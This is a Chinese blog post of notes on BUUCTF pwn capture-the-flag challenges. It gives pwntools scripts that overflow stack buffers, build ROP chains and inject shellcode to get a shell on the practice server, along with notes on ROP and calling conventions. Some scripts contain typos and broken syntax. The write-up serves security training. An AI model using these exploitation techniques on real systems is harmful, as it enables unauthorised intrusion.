BUUCTF

最新推荐文章于 2024-06-15 15:51:13 发布
最新推荐文章于 2024-06-15 15:51:13 发布
阅读量895 收藏 20
点赞数 25
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w394959000/article/details/136021077
版权

tset_yours_nc

ida分析

直接ls cat 有flag

rip

进行checkec得64位 无保护 为栈溢出

ida

shift+F12有/bin/sh

进一步有fun函数f5

获得fun地址编写exp

from pwn import*              
sh = remote('node4.buuoj.cn',27719)
#sh = process('./pwn1')          
payload = b'a'*23+p64(0x40118A)   
sh.sendline(payload)
sh.interactive()             

cat得flag

warmup_csaw_2016

同样64位 无保护 栈溢出

找到cat flag

找到后门函数

构建exp

from pwn import *
p=remote("node4.buuoj.cn",25851)
payload=b'a'*(0x40+8)+p64(0x400611+1)
p.sendline(payload)
p.interactive()

有flag

ciscn_2019_n_1

同是64位 有NX保护

ida

要使v2的值等于11.28125

找到其16进制表达41348000

构建exp

from pwn import

p=remote(“node5.buuoj.cn:26078)

payload=b’a'*(0x30-0x4)+p64(0x41348000)

p.spendline(payload)

p.interactive()

[HarekazeCTF2019]baby_rop.1

检查得64位开了NX保护

ida检查

payload='a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)
笔记

ROP即返回导向编程是一种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。
在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。
每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。
这些gadgets串联在一起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。

ROP的原理
ROP的原理是利用程序内存中已存在的以返回指令结尾的指令序列(gadgets)来控制程序执行流程。攻击者通过缓冲区溢出或其他方式在栈上布置数据,覆盖返回地址为gadgets的地址,从而实现代码注入。ROP可以绕过NX保护,因为它不需要在栈上执行任何新的代码,只需要利用现有的代码。ROP需要精心选择和拼接gadgets,以实现所需的功能。

ret2text的原理是控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护

ret2text前置条件

程序存在栈溢出漏洞,可以覆盖返回地址。

程序.text段中存在可以执行恶意命令的代码片段,或者可以利用ROP技术拼接多个代码片段。

程序没有开启地址随机化或者可以泄露地址信息,可以确定代码片段的地址

64位x86架构
  1. RDI (Destination Index): 用于传递第一个整数参数。
  2. RSI (Source Index): 用于传递第二个整数参数。
  3. RDX (Data Register): 用于传递第三个整数参数。
  4. RCX (Counter Register): 用于传递第四个整数参数。
  5. R8: 用于传递第五个整数参数。
  6. R9: 用于传递第六个整数参数。

如果函数的参数个数超过6个,则超过的参数直接使用栈来传递

0x400526    push    rbp
0x400527    mov     rbp, rsp
0x40052A    sub     rsp, 10h
0x40052E    mov     [rbp+var_8], 1  # 变量 a 赋值
0x400535    mov     [rbp+var_4], 2  # 变量 b 赋值
0x40053C    mov     edx, [rbp+var_4]  # 变量 b 传参
0x40053F    mov     eax, [rbp+var_8]  # 变量 a 传参
0x400542    mov     esi, edx  # 变量 b 传参
0x400544    mov     edi, eax  # 变量 a 传参
0x400546    mov     eax, 0
0x40054B    call    sum
0x400550    mov     esi, eax
0x400552    mov     edi, offset format ; "sum: %d"
0x400557    mov     eax, 0
0x40055C    call    _printf
0x400561    nop
0x400562    leave
0x400563    retn
32位架构

所有参数直接使用栈来传递

0x0804840B    lea     ecx, [esp+4]
0x0804840F    and     esp, 0FFFFFFF0h
0x08048412    push    dword ptr [ecx-4]
0x08048415    push    ebp
0x08048416    mov     ebp, esp
0x08048418    push    ecx
0x08048419    sub     esp, 14h
0x0804841C    mov     [ebp+var_10], 1  # 此处变量赋值 a
0x08048423    mov     [ebp+var_C], 2   # 此处变量赋值 b
0x0804842A    sub     esp, 8
0x0804842D    push    [ebp+var_C]  # 此处往栈中压入 b 的地址
0x08048430    push    [ebp+var_10] # 此处往栈中压入 a 的地址
0x08048433    call    sum
0x08048438    add     esp, 10h
0x0804843B    sub     esp, 8
0x0804843E    push    eax
0x0804843F    push    offset format   ; "sum: %d"
0x08048444    call    _printf
0x08048449    add     esp, 10h
0x0804844C    nop
0x0804844D    mov     ecx, [ebp+var_4]
0x08048450    leave
0x08048451    lea     esp, [ecx-4]
0x08048454    ret

ciscn_2019_n_5 

系统检查 64位 无保护 

无 system 与 /bin/sh 可用,可以构造shellcode即可直接获取shell

from pwn import *
elf = ELF("/home/pwn/桌面/ciscn_2019_n_5")
p = process("/home/pwn/桌面/ciscn_2019_n_5")
 
context(arch='amd64', os='linux')
context.log_level = 'debug'
 
shellcode = asm(shellcraft.sh())
 
p.sendlineafter('tell me your name\n', shellcode)
 
payload = flat(b'a' * (0x20 + 0x8) + p64(0x601080))
p.sendlineafter('What do you want to say to me?\n', payload)
 
p.interactive()

jarvisoj_level2

检查 32位 有NX保护

ida

binsh_addr = 0804A024

payload = b’a’*(136+4)+ p32(system_addr)+p32(main_addr)+p32(binsh_addr)

llllIIIlllllI
关注
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF题解
qq_51175992的博客
05-27 4210
BUUCTF题解,主要包括CTF中的Crypto、Misc方向,其中一些题目的解法参考了其他博主大佬的思路。这个文章主要是用于自学和提供思路解法,会不定时更新
BUUCTF 相册
qq_45317844的博客
03-21 225
jadx打开安装包。
Buuctf Http
Dexret的博客
12-07 2257
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
BUUCTF Crypto
qq_74388419的博客
04-26 592
Crypto
BUUCTF相册
Itach11_的博客
06-15 189
提取文件,发现是apk文件,用jadx打开,根据题面,flag和邮箱有关,在jadx中搜索mail,发现一个mailsendbyjavamail函数,发现mailserver,就是我们需要的邮箱, 他是so文件经过nativemethod函数返回的值(好像是这么个意思,我也是看了wp才知道),这里有三个字符串,用ida打开so文件,找到这三个字符串,发现三个可疑的字符串,base64解密,得到一个邮箱,即flag.
BUUCTF LOVESQL
ANYOUZHEN的博客
05-16 469
打开网页后,利用hackbar,先来查询他的列数 1‘ order by 3# 试了1,2,3,4都不行,初步判断#是被后端代码过滤掉了,我们试试--+,和#的效果是一样的 但是当我尝试使用--+后发现仍然没有反应,说明后端代码也过滤掉了--+,我们采用另外一种方式,使用%23 当我把3改为4时,出现了,说明列数为3,接下来好办了,老套路 使用联合查询:1’ union select 1,2,3 %23 2,3有回显,说明2,3存在注入点 找数据库 ?username=1.
BUUCTF PHP
m0_73867210的博客
02-03 250
习惯性的查看源码 但没发现什么,于是搜其他大佬的文章得知这个题目重点在网站备份,我没有下载扫描网站的软件,看其他博主扫到的结果是有一个压缩文件的构造playload,得到压缩包 压缩得到四个代码文件 依次查看发现只有class.php与flag有关 分析代码,因为基础有欠缺,好几个函数不知道什么意思,看到别的博主说是PHP反序列化,咱也没听过,就复制了playload得到了flag 参考这位博主的文章也是学到了很多,比如网络备份文件,PHP反序列化,以及P
BUUCTF helloword
m0_49025459的博客
02-13 706
有难的题目,也就有简单的题目,就像程序员一辈子编写的第一个程序,极有可能是helloword,它很普通,但是也很让人怀念。你猜这题flag在哪里?让我们怀念第一次编写的easy程序吧!注意:得到的 flag 请包上 flag{} 提交。下载附件发现是apk扔到jadx-gui里。如下图样式搜索就能看见flag了。点击文本搜索进行flag搜索。
BUUCTF LSB
qq_57294337的博客
11-17 411
BUUCTF LSB
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 309
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之前,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 259
在 Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux Centos 环境下搭建RocketMq集群(双主双从)
最新发布
gonghua0502的专栏
06-15 339
worker2中配置两个文件:broker-a.properties、broker-b-s.properties。worker3中配置两个文件:broker-b.properties、broker-a-s.properties。启动顺序为:先启动3台服务器的nameserver,再启动worker2和worker3中的broker.worker1 只需要启动nameserver即可。
linux中: IDEA 由于JVM 设置内存过小,导致打开项目闪退问题
m0_72560900的博客
06-12 366
在linux(debian/ubuntu)中idea的插件默认安装位置和配置文件在哪里?
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值